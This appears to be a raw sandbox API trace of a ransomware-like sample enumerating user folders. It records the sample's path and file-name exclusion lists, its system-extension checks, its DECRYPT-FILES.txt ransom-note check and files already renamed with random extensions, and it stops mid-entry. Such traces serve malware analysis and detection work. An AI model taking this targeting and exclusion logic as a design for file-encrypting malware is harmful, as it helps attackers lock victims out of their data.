0x0 [0186.476] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.476] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.476] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.476] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.476] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="\\All Users") returned 0x0 [0186.476] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.476] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.476] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.476] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="AhnLab") returned 0x0 [0186.476] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.476] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned 58 [0186.476] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.476] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\\\0a16c9.tmp") returned 69 [0186.476] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.482] GetLastError () returned 0x5 [0186.482] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned 58 [0186.482] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.482] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\\\DECRYPT-FILES.txt") returned 76 [0186.482] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.484] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned 58 [0186.484] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*" [0186.484] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0f76580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f76580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0186.484] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.484] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0f76580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f76580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.484] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.485] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.485] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeca9f1ef, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0c7ca00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x10b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Compressed (zipped) Folder.ZFSendToTarget.ldEb", cAlternateFileName="COMPRE~1.LDE")) returned 1 [0186.485] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget.ldEb", lpString2="DECRYPT-FILES.txt") returned -1 [0186.485] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget.ldEb", lpString2="autorun.inf") returned 1 [0186.485] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget.ldEb", lpString2="boot.ini") returned 1 [0186.485] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget.ldEb", lpString2="desktop.ini") returned -1 [0186.485] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget.ldEb", lpString2="ntuser.dat") returned -1 [0186.485] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget.ldEb", lpString2="iconcache.db") returned -1 [0186.485] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget.ldEb", lpString2="bootsect.bak") returned 1 [0186.485] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget.ldEb", lpString2="ntuser.dat.log") returned -1 [0186.485] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget.ldEb", lpString2="thumbs.db") returned -1 [0186.485] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget.ldEb", lpString2="Bootfont.bin") returned 1 [0186.485] lstrlenW (lpString="Compressed (zipped) Folder.ZFSendToTarget.ldEb") returned 46 [0186.485] lstrcmpiW (lpString1="ldEb", lpString2="lnk") returned -1 [0186.485] lstrcmpiW (lpString1="ldEb", lpString2="exe") returned 1 [0186.485] lstrcmpiW (lpString1="ldEb", lpString2="sys") returned -1 [0186.485] lstrcmpiW (lpString1="ldEb", lpString2="dll") returned 1 [0186.485] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned 58 [0186.485] lstrlenW (lpString="Compressed (zipped) Folder.ZFSendToTarget.ldEb") returned 46 [0186.485] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" [0186.485] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpString2="Compressed (zipped) Folder.ZFSendToTarget.ldEb" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget.ldEb") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget.ldEb" [0186.485] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.485] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget.ldEb" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\compressed (zipped) folder.zfsendtotarget.ldeb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.485] CloseHandle (hObject=0x0) returned 0 [0186.485] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.486] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0c568a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0c568a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0c568a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.486] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.486] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9c45a701, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0c7ca00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop (create shortcut).DeskLink.ldEb", cAlternateFileName="DESKTO~1.LDE")) returned 1 [0186.486] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink.ldEb", lpString2="DECRYPT-FILES.txt") returned 1 [0186.486] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink.ldEb", lpString2="autorun.inf") returned 1 [0186.486] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink.ldEb", lpString2="boot.ini") returned 1 [0186.486] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink.ldEb", lpString2="desktop.ini") returned -1 [0186.486] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink.ldEb", lpString2="ntuser.dat") returned -1 [0186.486] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink.ldEb", lpString2="iconcache.db") returned -1 [0186.486] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink.ldEb", lpString2="bootsect.bak") returned 1 [0186.486] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink.ldEb", lpString2="ntuser.dat.log") returned -1 [0186.486] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink.ldEb", lpString2="thumbs.db") returned -1 [0186.486] lstrcmpiW (lpString1="Desktop (create shortcut).DeskLink.ldEb", lpString2="Bootfont.bin") returned 1 [0186.486] lstrlenW (lpString="Desktop (create shortcut).DeskLink.ldEb") returned 39 [0186.486] lstrcmpiW (lpString1="ldEb", lpString2="lnk") returned -1 [0186.486] lstrcmpiW (lpString1="ldEb", lpString2="exe") returned 1 [0186.486] lstrcmpiW (lpString1="ldEb", lpString2="sys") returned -1 [0186.486] lstrcmpiW (lpString1="ldEb", lpString2="dll") returned 1 [0186.486] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned 58 [0186.486] lstrlenW (lpString="Desktop (create shortcut).DeskLink.ldEb") returned 39 [0186.486] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" [0186.486] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpString2="Desktop (create shortcut).DeskLink.ldEb" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink.ldEb") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink.ldEb" [0186.486] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.486] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink.ldEb" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop (create shortcut).desklink.ldeb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.487] CloseHandle (hObject=0x0) returned 0 [0186.487] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.487] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xec18bec6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x63dece0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3d828fa3, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x22e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0186.487] lstrcmpiW (lpString1="Desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.487] lstrcmpiW (lpString1="Desktop.ini", lpString2="autorun.inf") returned 1 [0186.487] lstrcmpiW (lpString1="Desktop.ini", lpString2="boot.ini") returned 1 [0186.487] lstrcmpiW (lpString1="Desktop.ini", lpString2="desktop.ini") returned 0 [0186.487] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x63dece0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x63dece0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf9b7c855, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents.mydocs", cAlternateFileName="DOCUME~1.MYD")) returned 1 [0186.487] lstrcmpiW (lpString1="Documents.mydocs", lpString2="DECRYPT-FILES.txt") returned 1 [0186.487] lstrcmpiW (lpString1="Documents.mydocs", lpString2="autorun.inf") returned 1 [0186.487] lstrcmpiW (lpString1="Documents.mydocs", lpString2="boot.ini") returned 1 [0186.487] lstrcmpiW (lpString1="Documents.mydocs", lpString2="desktop.ini") returned 1 [0186.487] lstrcmpiW (lpString1="Documents.mydocs", lpString2="ntuser.dat") returned -1 [0186.487] lstrcmpiW (lpString1="Documents.mydocs", lpString2="iconcache.db") returned -1 [0186.487] lstrcmpiW (lpString1="Documents.mydocs", lpString2="bootsect.bak") returned 1 [0186.487] lstrcmpiW (lpString1="Documents.mydocs", lpString2="ntuser.dat.log") returned -1 [0186.487] lstrcmpiW (lpString1="Documents.mydocs", lpString2="thumbs.db") returned -1 [0186.487] lstrcmpiW (lpString1="Documents.mydocs", lpString2="Bootfont.bin") returned 1 [0186.487] lstrlenW (lpString="Documents.mydocs") returned 16 [0186.487] lstrcmpiW (lpString1="mydocs", lpString2="lnk") returned 1 [0186.487] lstrcmpiW (lpString1="mydocs", lpString2="exe") returned 1 [0186.487] lstrcmpiW (lpString1="mydocs", lpString2="sys") returned -1 [0186.487] lstrcmpiW (lpString1="mydocs", lpString2="dll") returned 1 [0186.487] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned 58 [0186.487] lstrlenW (lpString="Documents.mydocs") returned 16 [0186.487] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" [0186.487] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpString2="Documents.mydocs" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Documents.mydocs") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Documents.mydocs" [0186.487] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.488] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Documents.mydocs" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\documents.mydocs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.488] CloseHandle (hObject=0x0) returned 0 [0186.488] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.488] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3d802e42, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x63dece0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3d802e42, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fax Recipient.lnk", cAlternateFileName="FAXREC~1.LNK")) returned 1 [0186.488] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0186.488] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="autorun.inf") returned 1 [0186.488] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="boot.ini") returned 1 [0186.488] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="desktop.ini") returned 1 [0186.488] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="ntuser.dat") returned -1 [0186.488] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="iconcache.db") returned -1 [0186.488] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="bootsect.bak") returned 1 [0186.488] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="ntuser.dat.log") returned -1 [0186.488] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="thumbs.db") returned -1 [0186.488] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="Bootfont.bin") returned 1 [0186.488] lstrlenW (lpString="Fax Recipient.lnk") returned 17 [0186.488] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0186.488] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9c48085e, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x63dece0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0ca2b60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x10c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mail Recipient.MAPIMail.YHpD", cAlternateFileName="MAILRE~1.YHP")) returned 1 [0186.488] lstrcmpiW (lpString1="Mail Recipient.MAPIMail.YHpD", lpString2="DECRYPT-FILES.txt") returned 1 [0186.488] lstrcmpiW (lpString1="Mail Recipient.MAPIMail.YHpD", lpString2="autorun.inf") returned 1 [0186.488] lstrcmpiW (lpString1="Mail Recipient.MAPIMail.YHpD", lpString2="boot.ini") returned 1 [0186.488] lstrcmpiW (lpString1="Mail Recipient.MAPIMail.YHpD", lpString2="desktop.ini") returned 1 [0186.489] lstrcmpiW (lpString1="Mail Recipient.MAPIMail.YHpD", lpString2="ntuser.dat") returned -1 [0186.489] lstrcmpiW (lpString1="Mail Recipient.MAPIMail.YHpD", lpString2="iconcache.db") returned 1 [0186.489] lstrcmpiW (lpString1="Mail Recipient.MAPIMail.YHpD", lpString2="bootsect.bak") returned 1 [0186.489] lstrcmpiW (lpString1="Mail Recipient.MAPIMail.YHpD", lpString2="ntuser.dat.log") returned -1 [0186.489] lstrcmpiW (lpString1="Mail Recipient.MAPIMail.YHpD", lpString2="thumbs.db") returned -1 [0186.489] lstrcmpiW (lpString1="Mail Recipient.MAPIMail.YHpD", lpString2="Bootfont.bin") returned 1 [0186.489] lstrlenW (lpString="Mail Recipient.MAPIMail.YHpD") returned 28 [0186.489] lstrcmpiW (lpString1="YHpD", lpString2="lnk") returned 1 [0186.489] lstrcmpiW (lpString1="YHpD", lpString2="exe") returned 1 [0186.489] lstrcmpiW (lpString1="YHpD", lpString2="sys") returned 1 [0186.489] lstrcmpiW (lpString1="YHpD", lpString2="dll") returned 1 [0186.489] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned 58 [0186.489] lstrlenW (lpString="Mail Recipient.MAPIMail.YHpD") returned 28 [0186.489] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" [0186.489] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpString2="Mail Recipient.MAPIMail.YHpD" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail.YHpD") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail.YHpD" [0186.489] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.489] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Mail Recipient.MAPIMail.YHpD" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\mail recipient.mapimail.yhpd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.489] CloseHandle (hObject=0x0) returned 0 [0186.489] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.489] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9c48085e, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x63dece0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0ca2b60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x10c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mail Recipient.MAPIMail.YHpD", cAlternateFileName="MAILRE~1.YHP")) returned 0 [0186.490] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0186.490] CloseHandle (hObject=0xffffffff) returned 0 [0186.490] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0f76580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f76580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0186.490] lstrcmpW (lpString1="Start Menu", lpString2=".") returned 1 [0186.490] lstrcmpW (lpString1="Start Menu", lpString2="..") returned 1 [0186.490] lstrcatW (in: lpString1="Start Menu", lpString2="\\" | out: lpString1="Start Menu\\") returned="Start Menu\\" [0186.490] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Start Menu\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\" [0186.490] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="\\Program Files") returned 0x0 [0186.490] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch=":\\Windows") returned 0x0 [0186.490] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="\\Games\\") returned 0x0 [0186.490] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.490] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.490] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.491] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.491] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.491] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="\\All Users") returned 0x0 [0186.491] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.491] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.491] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.491] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="AhnLab") returned 0x0 [0186.491] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.491] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\") returned 62 [0186.491] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.491] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\\\0a16c9.tmp") returned 73 [0186.491] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\start menu\\0a16c9.tmp"), dwDesiredAccess=0x0, 